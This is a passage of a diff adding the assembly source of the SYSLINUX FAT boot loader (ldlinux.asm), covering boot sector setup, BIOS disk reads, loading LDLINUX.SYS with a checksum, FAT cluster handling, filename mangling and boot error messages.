+; +StackBuf equ $-44-32 ; Start the stack here (grow down - 4K) +PartInfo equ StackBuf ; Saved partition table entry +FloppyTable equ PartInfo+16 ; Floppy info table (must follow PartInfo) +OrigFDCTabPtr equ StackBuf-4 ; The high dword on the stack + +; +; Primary entry point. Tempting as though it may be, we can't put the +; initial "cli" here; the jmp opcode in the first byte is part of the +; "magic number" (using the term very loosely) for the DOS superblock. +; +bootsec equ $ + jmp short start ; 2 bytes + nop ; 1 byte +; +; "Superblock" follows -- it's in the boot sector, so it's already +; loaded and ready for us +; +bsOemName db 'SYSLINUX' ; The SYS command sets this, so... +; +; These are the fields we actually care about. We end up expanding them +; all to dword size early in the code, so generate labels for both +; the expanded and unexpanded versions. +; +%macro superb 1 +bx %+ %1 equ SuperInfo+($-superblock)*8+4 +bs %+ %1 equ $ + zb 1 +%endmacro +%macro superw 1 +bx %+ %1 equ SuperInfo+($-superblock)*8 +bs %+ %1 equ $ + zw 1 +%endmacro +%macro superd 1 +bx %+ %1 equ $ ; no expansion for dwords +bs %+ %1 equ $ + zd 1 +%endmacro +superblock equ $ + superw BytesPerSec + superb SecPerClust + superw ResSectors + superb FATs + superw RootDirEnts + superw Sectors + superb Media + superw FATsecs + superw SecPerTrack + superw Heads +superinfo_size equ ($-superblock)-1 ; How much to expand + superd Hidden + superd HugeSectors + ; + ; This is as far as FAT12/16 and FAT32 are consistent + ; + zb 54 ; FAT12/16 need 26 more bytes, + ; FAT32 need 54 more bytes +superblock_len equ $-superblock + +SecPerClust equ bxSecPerClust +; +; Note we don't check the constraints above now; we did that at install +; time (we hope!) +; +start: + cli ; No interrupts yet, please + cld ; Copy upwards +; +; Set up the stack +; + xor ax,ax + mov ss,ax + mov sp,StackBuf ; Just below BSS + mov es,ax +; +; DS:SI may contain a partition table entry. Preserve it for us. 
+; + mov cx,8 ; Save partition info + mov di,sp + rep movsw + + mov ds,ax ; Now we can initialize DS... + +; +; Now sautee the BIOS floppy info block to that it will support decent- +; size transfers; the floppy block is 11 bytes and is stored in the +; INT 1Eh vector (brilliant waste of resources, eh?) +; +; Of course, if BIOSes had been properly programmed, we wouldn't have +; had to waste precious space with this code. +; + mov bx,fdctab + lfs si,[bx] ; FS:SI -> original fdctab + push fs ; Save on stack in case we need to bail + push si + + ; Save the old fdctab even if hard disk so the stack layout + ; is the same. The instructions above do not change the flags + mov [DriveNumber],dl ; Save drive number in DL + and dl,dl ; If floppy disk (00-7F), assume no + ; partition table + js harddisk + +floppy: + mov cl,6 ; 12 bytes (CX == 0) + ; es:di -> FloppyTable already + ; This should be safe to do now, interrupts are off... + mov [bx],di ; FloppyTable + mov [bx+2],ax ; Segment 0 + fs rep movsw ; Faster to move words + mov cl,[bsSecPerTrack] ; Patch the sector count + mov [di-8],cl + ; AX == 0 here + int 13h ; Some BIOSes need this + + jmp short not_harddisk +; +; The drive number and possibly partition information was passed to us +; by the BIOS or previous boot loader (MBR). Current "best practice" is to +; trust that rather than what the superblock contains. +; +; Would it be better to zero out bsHidden if we don't have a partition table? +; +; Note: di points to beyond the end of PartInfo +; +harddisk: + test byte [di-16],7Fh ; Sanity check: "active flag" should + jnz no_partition ; be 00 or 80 + mov eax,[di-8] ; Partition offset (dword) + mov [bsHidden],eax +no_partition: +; +; Get disk drive parameters (don't trust the superblock.) Don't do this for +; floppy drives -- INT 13:08 on floppy drives will (may?) return info about +; what the *drive* supports, not about the *media*. 
Fortunately floppy disks +; tend to have a fixed, well-defined geometry which is stored in the superblock. +; + ; DL == drive # still + mov ah,08h + int 13h + jc no_driveparm + and ah,ah + jnz no_driveparm + shr dx,8 + inc dx ; Contains # of heads - 1 + mov [bsHeads],dx + and cx,3fh + mov [bsSecPerTrack],cx +no_driveparm: +not_harddisk: +; +; Ready to enable interrupts, captain +; + sti + +; +; Do we have EBIOS (EDD)? +; +eddcheck: + mov bx,55AAh + mov ah,41h ; EDD existence query + mov dl,[DriveNumber] + int 13h + jc .noedd + cmp bx,0AA55h + jne .noedd + test cl,1 ; Extended disk access functionality set + jz .noedd + ; + ; We have EDD support... + ; + mov byte [getlinsec.jmp+1],(getlinsec_ebios-(getlinsec.jmp+2)) +.noedd: + +; +; Load the first sector of LDLINUX.SYS; this used to be all proper +; with parsing the superblock and root directory; it doesn't fit +; together with EBIOS support, unfortunately. +; + mov eax,[FirstSector] ; Sector start + mov bx,ldlinux_sys ; Where to load it + call getonesec + + ; Some modicum of integrity checking + cmp dword [ldlinux_magic+4],LDLINUX_MAGIC^HEXDATE + jne kaboom + + ; Go for it... + jmp ldlinux_ent + +; +; getonesec: get one disk sector +; +getonesec: + mov bp,1 ; One sector + ; Fall through + +; +; getlinsec: load a sequence of BP floppy sector given by the linear sector +; number in EAX into the buffer at ES:BX. We try to optimize +; by loading up to a whole track at a time, but the user +; is responsible for not crossing a 64K boundary. +; (Yes, BP is weird for a count, but it was available...) +; +; On return, BX points to the first byte after the transferred +; block. +; +; This routine assumes CS == DS, and trashes most registers. +; +; Stylistic note: use "xchg" instead of "mov" when the source is a register +; that is dead from that point; this saves space. However, please keep +; the order to dst,src to keep things sane. 
+; +getlinsec: + add eax,[bsHidden] ; Add partition offset + xor edx,edx ; Zero-extend LBA (eventually allow 64 bits) + +.patch: jmp strict near .jmp + +.jmp: jmp strict short getlinsec_cbios + +; +; getlinsec_ebios: +; +; getlinsec implementation for EBIOS (EDD) +; +getlinsec_ebios: +.loop: + push bp ; Sectors left +.retry2: + call maxtrans ; Enforce maximum transfer size + movzx edi,bp ; Sectors we are about to read + mov cx,retry_count +.retry: + + ; Form DAPA on stack + push edx + push eax + push es + push bx + push di + push word 16 + mov si,sp + pushad + mov dl,[DriveNumber] + push ds + push ss + pop ds ; DS <- SS + mov ah,42h ; Extended Read + int 13h + pop ds + popad + lea sp,[si+16] ; Remove DAPA + jc .error + pop bp + add eax,edi ; Advance sector pointer + sub bp,di ; Sectors left + shl di,SECTOR_SHIFT ; 512-byte sectors + add bx,di ; Advance buffer pointer + and bp,bp + jnz .loop + + ret + +.error: + ; Some systems seem to get "stuck" in an error state when + ; using EBIOS. Doesn't happen when using CBIOS, which is + ; good, since some other systems get timeout failures + ; waiting for the floppy disk to spin up. + + pushad ; Try resetting the device + xor ax,ax + mov dl,[DriveNumber] + int 13h + popad + loop .retry ; CX-- and jump if not zero + + ;shr word [MaxTransfer],1 ; Reduce the transfer size + ;jnz .retry2 + + ; Total failure. Try falling back to CBIOS. + mov byte [getlinsec.jmp+1],(getlinsec_cbios-(getlinsec.jmp+2)) + ;mov byte [MaxTransfer],63 ; Max possibe CBIOS transfer + + pop bp + ; ... fall through ... + +; +; getlinsec_cbios: +; +; getlinsec implementation for legacy CBIOS +; +getlinsec_cbios: +.loop: + push edx + push eax + push bp + push bx + + movzx esi,word [bsSecPerTrack] + movzx edi,word [bsHeads] + ; + ; Dividing by sectors to get (track,sector): we may have + ; up to 2^18 tracks, so we need to use 32-bit arithmetric. 
+ ; + div esi + xor cx,cx + xchg cx,dx ; CX <- sector index (0-based) + ; EDX <- 0 + ; eax = track # + div edi ; Convert track to head/cyl + + ; We should test this, but it doesn't fit... + ; cmp eax,1023 + ; ja .error + + ; + ; Now we have AX = cyl, DX = head, CX = sector (0-based), + ; BP = sectors to transfer, SI = bsSecPerTrack, + ; ES:BX = data target + ; + + call maxtrans ; Enforce maximum transfer size + + ; Must not cross track boundaries, so BP <= SI-CX + sub si,cx + cmp bp,si + jna .bp_ok + mov bp,si +.bp_ok: + + shl ah,6 ; Because IBM was STOOPID + ; and thought 8 bits were enough + ; then thought 10 bits were enough... + inc cx ; Sector numbers are 1-based, sigh + or cl,ah + mov ch,al + mov dh,dl + mov dl,[DriveNumber] + xchg ax,bp ; Sector to transfer count + mov ah,02h ; Read sectors + mov bp,retry_count +.retry: + pushad + int 13h + popad + jc .error +.resume: + movzx ecx,al ; ECX <- sectors transferred + shl ax,SECTOR_SHIFT ; Convert sectors in AL to bytes in AX + pop bx + add bx,ax + pop bp + pop eax + pop edx + add eax,ecx + sub bp,cx + jnz .loop + ret + +.error: + dec bp + jnz .retry + + xchg ax,bp ; Sectors transferred <- 0 + shr word [MaxTransfer],1 + jnz .resume + ; Fall through to disk_error + +; +; kaboom: write a message and bail out. +; +disk_error: +kaboom: + xor si,si + mov ss,si + mov sp,StackBuf-4 ; Reset stack + mov ds,si ; Reset data segment + pop dword [fdctab] ; Restore FDC table +.patch: ; When we have full code, intercept here + mov si,bailmsg + + ; Write error message, this assumes screen page 0 +.loop: lodsb + and al,al + jz .done + mov ah,0Eh ; Write to screen as TTY + mov bx,0007h ; Attribute + int 10h + jmp short .loop +.done: + cbw ; AH <- 0 + int 16h ; Wait for keypress + int 19h ; And try once more to boot... 
+.norge: jmp short .norge ; If int 19h returned; this is the end + +; +; Truncate BP to MaxTransfer +; +maxtrans: + cmp bp,[MaxTransfer] + jna .ok + mov bp,[MaxTransfer] +.ok: ret + +; +; Error message on failure +; +bailmsg: db 'Boot error', 0Dh, 0Ah, 0 + + ; This fails if the boot sector overflows + zb 1F8h-($-$$) + +FirstSector dd 0xDEADBEEF ; Location of sector 1 +MaxTransfer dw 0x007F ; Max transfer size +bootsignature dw 0AA55h + +; +; =========================================================================== +; End of boot sector +; =========================================================================== +; Start of LDLINUX.SYS +; =========================================================================== + +ldlinux_sys: + +syslinux_banner db 0Dh, 0Ah +%if IS_MDSLINUX + db 'MDSLINUX ' +%else + db 'SYSLINUX ' +%endif + db version_str, ' ', date, ' ', 0 + db 0Dh, 0Ah, 1Ah ; EOF if we "type" this in DOS + + align 8, db 0 +ldlinux_magic dd LDLINUX_MAGIC + dd LDLINUX_MAGIC^HEXDATE + +; +; This area is patched by the installer. It is found by looking for +; LDLINUX_MAGIC, plus 8 bytes. +; +patch_area: +LDLDwords dw 0 ; Total dwords starting at ldlinux_sys +LDLSectors dw 0 ; Number of sectors - (bootsec+this sec) +CheckSum dd 0 ; Checksum starting at ldlinux_sys + ; value = LDLINUX_MAGIC - [sum of dwords] + +; Space for up to 64 sectors, the theoretical maximum +SectorPtrs times 64 dd 0 + +ldlinux_ent: +; +; Note that some BIOSes are buggy and run the boot sector at 07C0:0000 +; instead of 0000:7C00 and the like. We don't want to add anything +; more to the boot sector, so it is written to not assume a fixed +; value in CS, but we don't want to deal with that anymore from now +; on. 
+; + jmp 0:.next +.next: + +; +; Tell the user we got this far +; + mov si,syslinux_banner + call writestr + +; +; Tell the user if we're using EBIOS or CBIOS +; +print_bios: + mov si,cbios_name + cmp byte [getlinsec.jmp+1],(getlinsec_ebios-(getlinsec.jmp+2)) + jne .cbios + mov si,ebios_name +.cbios: + mov [BIOSName],si + call writestr + + section .bss +%define HAVE_BIOSNAME 1 +BIOSName resw 1 + + section .text +; +; Now we read the rest of LDLINUX.SYS. Don't bother loading the first +; sector again, though. +; +load_rest: + mov si,SectorPtrs + mov bx,7C00h+2*SECTOR_SIZE ; Where we start loading + mov cx,[LDLSectors] + +.get_chunk: + jcxz .done + xor bp,bp + lodsd ; First sector of this chunk + + mov edx,eax + +.make_chunk: + inc bp + dec cx + jz .chunk_ready + inc edx ; Next linear sector + cmp [si],edx ; Does it match + jnz .chunk_ready ; If not, this is it + add si,4 ; If so, add sector to chunk + jmp short .make_chunk + +.chunk_ready: + call getlinsecsr + shl bp,SECTOR_SHIFT + add bx,bp + jmp .get_chunk + +.done: + +; +; All loaded up, verify that we got what we needed. +; Note: the checksum field is embedded in the checksum region, so +; by the time we get to the end it should all cancel out. +; +verify_checksum: + mov si,ldlinux_sys + mov cx,[LDLDwords] + mov edx,-LDLINUX_MAGIC +.checksum: + lodsd + add edx,eax + loop .checksum + + and edx,edx ; Should be zero + jz all_read ; We're cool, go for it! + +; +; Uh-oh, something went bad... +; + mov si,checksumerr_msg + call writestr + jmp kaboom + +; +; ----------------------------------------------------------------------------- +; Subroutines that have to be in the first sector +; ----------------------------------------------------------------------------- + +; +; +; writestr: write a null-terminated string to the console +; This assumes we're on page 0. This is only used for early +; messages, so it should be OK. 
+; +writestr: +.loop: lodsb + and al,al + jz .return + mov ah,0Eh ; Write to screen as TTY + mov bx,0007h ; Attribute + int 10h + jmp short .loop +.return: ret + + +; getlinsecsr: save registers, call getlinsec, restore registers +; +getlinsecsr: pushad + call getlinsec + popad + ret + +; +; Checksum error message +; +checksumerr_msg db ' Load error - ', 0 ; Boot failed appended + +; +; BIOS type string +; +cbios_name db 'CBIOS', 0 +ebios_name db 'EBIOS', 0 + +; +; Debug routine +; +%ifdef debug +safedumpregs: + cmp word [Debug_Magic],0D00Dh + jnz nc_return + jmp dumpregs +%endif + +rl_checkpt equ $ ; Must be <= 8000h + +rl_checkpt_off equ ($-$$) +%ifndef DEPEND +%if rl_checkpt_off > 400h +%error "Sector 1 overflow" +%endif +%endif + +; ---------------------------------------------------------------------------- +; End of code and data that have to be in the first sector +; ---------------------------------------------------------------------------- + +all_read: +; +; Let the user (and programmer!) know we got this far. This used to be +; in Sector 1, but makes a lot more sense here. +; + mov si,copyright_str + call writestr + + +; +; Insane hack to expand the superblock to dwords +; +expand_super: + xor eax,eax + mov si,superblock + mov di,SuperInfo + mov cx,superinfo_size +.loop: + lodsw + dec si + stosd ; Store expanded word + xor ah,ah + stosd ; Store expanded byte + loop .loop + +; +; Compute some information about this filesystem. 
+; + +; First, generate the map of regions +genfatinfo: + mov edx,[bxSectors] + and dx,dx + jnz .have_secs + mov edx,[bsHugeSectors] +.have_secs: + mov [TotalSectors],edx + + add edx,eax + mov [EndSector],edx + + mov eax,[bxResSectors] + mov [FAT],eax ; Beginning of FAT + mov edx,[bxFATsecs] + and dx,dx + jnz .have_fatsecs + mov edx,[bootsec+36] ; FAT32 BPB_FATsz32 +.have_fatsecs: + imul edx,[bxFATs] + add eax,edx + mov [RootDirArea],eax ; Beginning of root directory + mov [RootDir],eax ; For FAT12/16 == root dir location + + mov edx,[bxRootDirEnts] + add dx,SECTOR_SIZE/32-1 + shr dx,SECTOR_SHIFT-5 + mov [RootDirSize],edx + add eax,edx + mov [DataArea],eax ; Beginning of data area + +; Next, generate a cluster size shift count and mask + mov eax,[bxSecPerClust] + bsr cx,ax + mov [ClustShift],cl + push cx + add cl,9 + mov [ClustByteShift],cl + pop cx + dec ax + mov [ClustMask],eax + inc ax + shl eax,9 + mov [ClustSize],eax + +; +; FAT12, FAT16 or FAT28^H^H32? This computation is fscking ridiculous. +; +getfattype: + mov eax,[EndSector] + sub eax,[DataArea] + shr eax,cl ; cl == ClustShift + mov cl,nextcluster_fat12-(nextcluster+2) + cmp eax,4085 ; FAT12 limit + jb .setsize + mov cl,nextcluster_fat16-(nextcluster+2) + cmp eax,65525 ; FAT16 limit + jb .setsize + ; + ; FAT32, root directory is a cluster chain + ; + mov cl,[ClustShift] + mov eax,[bootsec+44] ; Root directory cluster + sub eax,2 + shl eax,cl + add eax,[DataArea] + mov [RootDir],eax + mov cl,nextcluster_fat28-(nextcluster+2) +.setsize: + mov byte [nextcluster+1],cl + +; +; Common initialization code +; +%include "cpuinit.inc" +%include "init.inc" + +; +; Clear Files structures +; + mov di,Files + mov cx,(MAX_OPEN*open_file_t_size)/4 + xor eax,eax + rep stosd + +; +; Initialize the metadata cache +; + call initcache + +; +; Now, everything is "up and running"... 
patch kaboom for more +; verbosity and using the full screen system +; + ; E9 = JMP NEAR + mov dword [kaboom.patch],0e9h+((kaboom2-(kaboom.patch+3)) << 8) + +; +; Now we're all set to start with our *real* business. First load the +; configuration file (if any) and parse it. +; +; In previous versions I avoided using 32-bit registers because of a +; rumour some BIOSes clobbered the upper half of 32-bit registers at +; random. I figure, though, that if there are any of those still left +; they probably won't be trying to install Linux on them... +; +; The code is still ripe with 16-bitisms, though. Not worth the hassle +; to take'm out. In fact, we may want to put them back if we're going +; to boot ELKS at some point. +; + +; +; Load configuration file +; + mov di,syslinux_cfg + call open + jz no_config_file + +; +; Now we have the config file open. Parse the config file and +; run the user interface. +; +%include "ui.inc" + +; +; Linux kernel loading code is common. +; +%include "runkernel.inc" + +; +; COMBOOT-loading code +; +%include "comboot.inc" +%include "com32.inc" +%include "cmdline.inc" + +; +; Boot sector loading code +; +%include "bootsect.inc" + +; +; Boot a specified local disk. AX specifies the BIOS disk number; or +; 0xFFFF in case we should execute INT 18h ("next device.") +; +local_boot: +%ifdef WITH_GFX + call gfx_done +%endif + call vgaclearmode + lss sp,[cs:Stack] ; Restore stack pointer + xor dx,dx + mov ds,dx + mov es,dx + mov fs,dx + mov gs,dx + mov si,localboot_msg + call cwritestr + cmp ax,-1 + je .int18 + + ; Load boot sector from the specified BIOS device and jump to it. 
+ mov dl,al + xor dh,dh + push dx + xor ax,ax ; Reset drive + int 13h + mov ax,0201h ; Read one sector + mov cx,0001h ; C/H/S = 0/0/1 (first sector) + mov bx,trackbuf + int 13h + pop dx + cli ; Abandon hope, ye who enter here + mov si,trackbuf + mov di,07C00h + mov cx,512 ; Probably overkill, but should be safe + rep movsd + mov ss,cx + mov sp,7c00h + jmp 0:07C00h ; Jump to new boot sector + +.int18: + int 18h ; Hope this does the right thing... + jmp kaboom ; If we returned, oh boy... + +; +; Abort loading code +; +%include "abort.inc" + +; +; allocate_file: Allocate a file structure +; +; If successful: +; ZF set +; BX = file pointer +; In unsuccessful: +; ZF clear +; +allocate_file: + TRACER 'a' + push cx + mov bx,Files + mov cx,MAX_OPEN +.check: cmp dword [bx], byte 0 + je .found + add bx,open_file_t_size ; ZF = 0 + loop .check + ; ZF = 0 if we fell out of the loop +.found: pop cx + ret + +; +; searchdir: +; Search the root directory for a pre-mangled filename in DS:DI. +; +; NOTE: This file considers finding a zero-length file an +; error. This is so we don't have to deal with that special +; case elsewhere in the program (most loops have the test +; at the end). 
+; +; If successful: +; ZF clear +; SI = file pointer +; DX:AX = file length in bytes +; If unsuccessful +; ZF set +; + +searchdir: + push bx + call allocate_file + jnz .alloc_failure + + push cx + push gs + push es + push ds + pop es ; ES = DS + + mov eax,[RootDir] ; First root directory sector + +.scansector: + call getcachesector + ; GS:SI now points to this sector + + mov cx,SECTOR_SIZE/32 ; 32 == directory entry size +.scanentry: + cmp byte [gs:si],0 + jz .failure ; Hit directory high water mark + push cx + push si + push di + mov cx,11 + gs repe cmpsb + pop di + pop si + pop cx + jz .found + add si,32 + loop .scanentry + + call nextsector + jnc .scansector ; CF is set if we're at end + + ; If we get here, we failed +.failure: + pop es + pop gs + pop cx +.alloc_failure: + pop bx + xor eax,eax ; ZF <- 1 + ret +.found: + mov eax,[gs:si+28] ; File size + add eax,SECTOR_SIZE-1 + shr eax,SECTOR_SHIFT + jz .failure ; Zero-length file + mov [bx+4],eax + + mov cl,[ClustShift] + mov dx,[gs:si+20] ; High cluster word + shl edx,16 + mov dx,[gs:si+26] ; Low cluster word + sub edx,2 + shl edx,cl + add edx,[DataArea] + mov [bx],edx ; Starting sector + + mov eax,[gs:si+28] ; File length again + mov dx,[gs:si+30] ; 16-bitism, sigh + mov si,bx + and eax,eax ; ZF <- 0 + + pop es + pop gs + pop cx + pop bx + ret + +; +; +; kaboom2: once everything is loaded, replace the part of kaboom +; starting with "kaboom.patch" with this part + +kaboom2: + cmp byte [gfx_ok],0 + jz .nogfx + mov si,err_failed_gfx + xor di,di + mov al,1 + call gfx_infobox + call gfx_done + call do_reboot +.nogfx: + mov si,err_bootfailed + call cwritestr + call getchar + call vgaclearmode + int 19h ; And try once more to boot... 
+.norge: jmp short .norge ; If int 19h returned; this is the end + +; +; mangle_name: Mangle a DOS filename pointed to by DS:SI into a buffer pointed +; to by ES:DI; ends on encountering any whitespace +; + +mangle_name: + mov cx,11 ; # of bytes to write +mn_loop: + lodsb + cmp al,' ' ; If control or space, end + jna mn_end + cmp al,'.' ; Period -> space-fill + je mn_is_period + cmp al,'a' + jb mn_not_lower + cmp al,'z' + ja mn_not_uslower + sub al,020h + jmp short mn_not_lower +mn_is_period: mov al,' ' ; We need to space-fill +mn_period_loop: cmp cx,3 ; If <= 3 characters left + jbe mn_loop ; Just ignore it + stosb ; Otherwise, write a period + loop mn_period_loop ; Dec CX and (always) jump +mn_not_uslower: cmp al,ucase_low + jb mn_not_lower + cmp al,ucase_high + ja mn_not_lower + mov bx,ucase_tab-ucase_low + cs xlatb +mn_not_lower: stosb + loop mn_loop ; Don't continue if too long +mn_end: + mov al,' ' ; Space-fill name + rep stosb ; Doesn't do anything if CX=0 + ret ; Done + +; +; Upper-case table for extended characters; this is technically code page 865, +; but code page 437 users will probably not miss not being able to use the +; cent sign in kernel images too much :-) +; +; The table only covers the range 129 to 164; the rest we can deal with. +; +ucase_low equ 129 +ucase_high equ 164 +ucase_tab db 154, 144, 'A', 142, 'A', 143, 128, 'EEEIII' + db 142, 143, 144, 146, 146, 'O', 153, 'OUUY', 153, 154 + db 157, 156, 157, 158, 159, 'AIOU', 165 + +; +; unmangle_name: Does the opposite of mangle_name; converts a DOS-mangled +; filename to the conventional representation. This is needed +; for the BOOT_IMAGE= parameter for the kernel. +; NOTE: A 13-byte buffer is mandatory, even if the string is +; known to be shorter. +; +; DS:SI -> input mangled file name +; ES:DI -> output buffer +; +; On return, DI points to the first byte after the output name, +; which is set to a null byte. 
+; +unmangle_name: + push si ; Save pointer to original name + mov cx,8 + mov bp,di +un_copy_body: lodsb + call lower_case + stosb + cmp al,' ' + jbe un_cb_space + mov bp,di ; Position of last nonblank+1 +un_cb_space: loop un_copy_body + mov di,bp + mov al,'.' ; Don't save + stosb + mov cx,3 +un_copy_ext: lodsb + call lower_case + stosb + cmp al,' ' + jbe un_ce_space + mov bp,di +un_ce_space: loop un_copy_ext + mov di,bp + mov byte [es:di], 0 + pop si + ret + +; +; lower_case: Lower case a character in AL +; +lower_case: + cmp al,'A' + jb lc_ret + cmp al,'Z' + ja lc_1 + or al,20h + ret +lc_1: cmp al,lcase_low + jb lc_ret + cmp al,lcase_high + ja lc_ret + push bx + mov bx,lcase_tab-lcase_low + cs xlatb + pop bx +lc_ret: ret + +; +; getfssec_edx: Get multiple sectors from a file +; +; This routine makes sure the subtransfers do not cross a 64K boundary, +; and will correct the situation if it does, UNLESS *sectors* cross +; 64K boundaries. +; +; ES:BX -> Buffer +; EDX -> Current sector number +; CX -> Sector count (0FFFFh = until end of file) +; Must not exceed the ES segment +; Returns EDX=0, CF=1 on EOF (not necessarily error) +; All arguments are advanced to reflect data read. +; +getfssec_edx: + push ebp + push eax +.getfragment: + xor ebp,ebp ; Fragment sector count + push edx ; Starting sector pointer +.getseccnt: + inc bp + dec cx + jz .do_read + xor eax,eax + mov ax,es + shl ax,4 + add ax,bx ; Now AX = how far into 64K block we are + not ax ; Bytes left in 64K block + inc eax + shr eax,SECTOR_SHIFT ; Sectors left in 64K block + cmp bp,ax + jnb .do_read ; Unless there is at least 1 more sector room... + mov eax,edx ; Current sector + inc edx ; Predict it's the linearly next sector + call nextsector + jc .do_read + cmp edx,eax ; Did it match? 
+ jz .getseccnt +.do_read: + pop eax ; Starting sector pointer + call getlinsecsr + lea eax,[eax+ebp-1] ; This is the last sector actually read + shl bp,9 + add bx,bp ; Adjust buffer pointer + call nextsector + jc .eof + mov edx,eax + and cx,cx + jnz .getfragment +.done: + pop eax + pop ebp + ret +.eof: + xor edx,edx + stc + jmp .done + +; +; getfssec: Get multiple sectors from a file +; +; Same as above, except SI is a pointer to a open_file_t +; +; ES:BX -> Buffer +; DS:SI -> Pointer to open_file_t +; CX -> Sector count (0FFFFh = until end of file) +; Must not exceed the ES segment +; Returns CF=1 on EOF (not necessarily error) +; All arguments are advanced to reflect data read. +; +getfssec: + push edx + movzx edx,cx + cmp edx,[si+4] + jbe .sizeok + mov edx,[si+4] + mov cx,dx +.sizeok: + sub [si+4],edx + mov edx,[si] + call getfssec_edx + mov [si],edx + pop edx + ret + +; +; nextcluster: Advance a cluster pointer in EDI to the next cluster +; pointed at in the FAT tables. CF=0 on return if end of file. +; +nextcluster: + jmp strict short nextcluster_fat28 ; This gets patched + +nextcluster_fat12: + push eax + push edx + push bx + push cx + push si + mov edx,edi + shr edi,1 + pushf ; Save the shifted-out LSB (=CF) + add edx,edi + mov eax,edx + shr eax,9 + call getfatsector + mov bx,dx + and bx,1FFh + mov cl,[gs:si+bx] + inc edx + mov eax,edx + shr eax,9 + call getfatsector + mov bx,dx + and bx,1FFh + mov ch,[gs:si+bx] + popf + jnc .even + shr cx,4 +.even: and cx,0FFFh + movzx edi,cx + cmp di,0FF0h + pop si + pop cx + pop bx + pop edx + pop eax + ret + +; +; FAT16 decoding routine. +; +nextcluster_fat16: + push eax + push si + push bx + mov eax,edi + shr eax,SECTOR_SHIFT-1 + call getfatsector + mov bx,di + add bx,bx + and bx,1FEh + movzx edi,word [gs:si+bx] + cmp di,0FFF0h + pop bx + pop si + pop eax + ret +; +; FAT28 ("FAT32") decoding routine. 
+; +nextcluster_fat28: + push eax + push si + push bx + mov eax,edi + shr eax,SECTOR_SHIFT-2 + call getfatsector + mov bx,di + add bx,bx + add bx,bx + and bx,1FCh + mov edi,dword [gs:si+bx] + and edi,0FFFFFFFh ; 28 bits only + cmp edi,0FFFFFF0h + pop bx + pop si + pop eax + ret + +; +; nextsector: Given a sector in EAX on input, return the next sector +; of the same filesystem object, which may be the root +; directory or a cluster chain. Returns EOF. +; +; Assumes CS == DS. +; +nextsector: + push edi + push edx + mov edx,[DataArea] + mov edi,eax + sub edi,edx + jae .isdata + + ; Root directory + inc eax + cmp eax,edx + cmc + jmp .done + +.isdata: + not edi + test edi,[ClustMask] + jz .endcluster + + ; It's not the final sector in a cluster + inc eax + jmp .done + +.endcluster: + push gs ; nextcluster trashes gs + push cx + not edi + mov cl,[ClustShift] + shr edi,cl + add edi,2 + + ; Now EDI contains the cluster number + call nextcluster + cmc + jc .exit ; There isn't anything else... + + ; New cluster number now in EDI + sub edi,2 + shl edi,cl ; CF <- 0, unless something is very wrong + lea eax,[edi+edx] +.exit: + pop cx + pop gs +.done: + pop edx + pop edi + ret + +; +; getfatsector: Check for a particular sector (in EAX) in the FAT cache, +; and return a pointer in GS:SI, loading it if needed. +; +; Assumes CS == DS. 
+; +getfatsector: + add eax,[FAT] ; FAT starting address + jmp getcachesector + +; ----------------------------------------------------------------------------- +; Common modules +; ----------------------------------------------------------------------------- + +%include "getc.inc" ; getc et al +%include "conio.inc" ; Console I/O +%include "plaincon.inc" ; writechr +%include "writestr.inc" ; String output +%include "parseconfig.inc" ; High-level config file handling +%include "parsecmd.inc" ; Low-level config file handling +%include "bcopy32.inc" ; 32-bit bcopy +%include "loadhigh.inc" ; Load a file into high memory +%include "font.inc" ; VGA font stuff +%include "graphics.inc" ; VGA graphics +%include "highmem.inc" ; High memory sizing +%include "strcpy.inc" ; strcpy() +%include "cache.inc" ; Metadata disk cache + +%include "gfxboot.inc" ; add gfx things + +; ----------------------------------------------------------------------------- +; Begin data section +; ----------------------------------------------------------------------------- + + section .data +; +; Lower-case table for codepage 865 +; +lcase_low equ 128 +lcase_high equ 165 +lcase_tab db 135, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138 + db 139, 140, 141, 132, 134, 130, 145, 145, 147, 148, 149 + db 150, 151, 152, 148, 129, 155, 156, 155, 158, 159, 160 + db 161, 162, 163, 164, 164 + +copyright_str db ' Copyright (C) 1994-', year, ' H. Peter Anvin' + db CR, LF, 0 +boot_prompt db 'boot: ', 0 +wipe_char db BS, ' ', BS, 0 +err_notfound db 'Could not find kernel image: ',0 +err_notkernel db CR, LF, 'Invalid or corrupt kernel image.', CR, LF, 0 +err_noram db 'It appears your computer has less than ' + asciidec dosram_k + db 'K of low ("DOS")' + db CR, LF + db 'RAM. Linux needs at least this amount to boot. 
If you get' + db CR, LF + db 'this message in error, hold down the Ctrl key while' + db CR, LF + db 'booting, and I will take your word for it.', CR, LF, 0 +err_badcfg db 'Unknown keyword in syslinux.cfg.', CR, LF, 0 +err_noparm db 'Missing parameter in syslinux.cfg.', CR, LF, 0 +err_noinitrd db CR, LF +err_noinitrda db 'Could not find ramdisk image: ', 0 +err_nohighmem db 'Not enough memory to load specified kernel.', CR, LF, 0 +err_highload db CR, LF, 'Kernel transfer failure.', CR, LF, 0 +err_oldkernel db 'Cannot load a ramdisk with an old kernel image.' + db CR, LF, 0 +err_notdos db ': attempted DOS system call', CR, LF, 0 +err_comlarge db 'COMBOOT image too large.', CR, LF, 0 +err_a20 db CR, LF, 'A20 gate not responding!', CR, LF, 0 +err_bootfailed db CR, LF, 'Boot failed: please change disks and press ' + db 'a key to continue.', CR, LF, 0 +err_failed_gfx db 'Error reading from disk.', 0 +ready_msg db 'Ready.', CR, LF, 0 +localboot_msg db 'Booting from local disk...', CR, LF, 0 +crlfloading_msg db CR, LF +loading_msg db 'Loading ', 0 +dotdot_msg db '.' +dot_msg db '.', 0 +aborted_msg db ' aborted.' ; Fall through to crlf_msg! +crlf_msg db CR, LF +null_msg db 0 +crff_msg db CR, FF, 0 +syslinux_cfg db 'SYSLINUXCFG' ; Mangled form +ConfigName db 'syslinux.cfg',0 ; Unmangled form +%if IS_MDSLINUX +manifest db 'MANIFEST ' +%endif +; +; Command line options we'd like to take a look at +; +; mem= and vga= are handled as normal 32-bit integer values +initrd_cmd db 'initrd=' +initrd_cmd_len equ 7 + +; +; Config file keyword table +; +%include "keywords.inc" + +; +; Extensions to search for (in *forward* order). 
+;
+exten_table: db 'CBT',0 ; COMBOOT (specific)
+ db 'BSS',0 ; Boot Sector (add superblock)
+ db 'BS ',0 ; Boot Sector
+ db 'COM',0 ; COMBOOT (same as DOS)
+ db 'C32',0 ; COM32
+exten_table_end:
+ dd 0, 0 ; Need 8 null bytes here
+
+;
+; Misc initialized (data) variables
+;
+%ifdef debug ; This code for debugging only
+debug_magic dw 0D00Dh ; Debug code sentinel
+%endif
+
